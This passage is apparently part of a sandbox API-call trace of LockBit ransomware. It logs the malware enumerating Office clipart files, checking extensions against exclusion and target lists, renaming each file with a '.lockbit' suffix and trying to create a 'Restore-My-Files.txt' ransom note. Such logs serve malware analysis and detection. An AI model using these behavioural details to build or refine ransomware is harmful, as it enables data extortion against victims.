lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.842] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.842] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF.lockbit") returned 72 [0138.842] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105388.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0138.849] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.849] malloc (_Size=0x40068) returned 0x1ff1e60 [0138.849] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8252) returned 1 [0138.849] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.849] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0138.849] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.850] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0138.850] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.852] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.852] malloc (_Size=0xa6) returned 0x77d7a8 [0138.852] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.853] free (_Block=0x77d7a8) [0138.853] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.853] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.853] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.853] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1350, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105390.WMF", cAlternateFileName="")) returned 1 [0138.853] lstrcmpiW (lpString1=".", lpString2="J0105390.WMF") returned -1 [0138.853] lstrcmpiW (lpString1="..", lpString2="J0105390.WMF") returned -1 [0138.853] PathFindExtensionW (pszPath="J0105390.WMF") returned=".WMF" [0138.853] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.853] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.853] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.853] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.853] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.853] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.853] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.853] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.853] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.854] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.854] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105390.WMF") returned 1 [0138.855] lstrcmpiW (lpString1="ntldr", lpString2="J0105390.WMF") returned 1 [0138.855] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105390.WMF") returned 1 [0138.855] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105390.WMF") returned -1 [0138.855] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105390.WMF") returned -1 [0138.855] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105390.WMF") returned 1 [0138.855] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105390.WMF") returned -1 [0138.855] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.855] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF") returned=".WMF" [0138.855] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.855] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.855] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.856] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.856] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.856] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.856] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.856] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.856] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.856] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.856] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.856] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.856] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.856] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.856] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF.lockbit") returned 72 [0138.856] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105390.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0138.856] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.857] malloc (_Size=0x40068) returned 0x3d70450 [0138.857] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4944) returned 1 [0138.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0138.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0138.857] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.861] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.861] malloc (_Size=0xa6) returned 0x77d7a8 [0138.861] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.863] free (_Block=0x77d7a8) [0138.863] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.863] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.863] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.863] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2b04, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105396.WMF", cAlternateFileName="")) returned 1 [0138.863] lstrcmpiW (lpString1=".", lpString2="J0105396.WMF") returned -1 [0138.863] lstrcmpiW (lpString1="..", lpString2="J0105396.WMF") returned -1 [0138.863] PathFindExtensionW (pszPath="J0105396.WMF") returned=".WMF" [0138.863] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.863] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.864] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.864] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105396.WMF") returned 1 [0138.865] lstrcmpiW (lpString1="ntldr", lpString2="J0105396.WMF") returned 1 [0138.865] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105396.WMF") returned 1 [0138.865] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105396.WMF") returned -1 [0138.865] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105396.WMF") returned -1 [0138.865] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105396.WMF") returned 1 [0138.865] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105396.WMF") returned -1 [0138.865] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.865] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF") returned=".WMF" [0138.865] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.865] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.865] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.866] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.866] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF.lockbit") returned 72 [0138.866] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105396.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.867] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.867] malloc (_Size=0x40068) returned 0x3e70008 [0138.867] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=11012) returned 1 [0138.867] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0138.868] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.868] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0138.868] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0138.872] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.872] malloc (_Size=0xa6) returned 0x77d7a8 [0138.872] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.873] free (_Block=0x77d7a8) [0138.873] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.873] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.873] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.873] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd00, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105398.WMF", cAlternateFileName="")) returned 1 [0138.873] lstrcmpiW (lpString1=".", lpString2="J0105398.WMF") returned -1 [0138.873] lstrcmpiW (lpString1="..", lpString2="J0105398.WMF") returned -1 [0138.873] PathFindExtensionW (pszPath="J0105398.WMF") returned=".WMF" [0138.873] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.873] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.873] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.873] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW 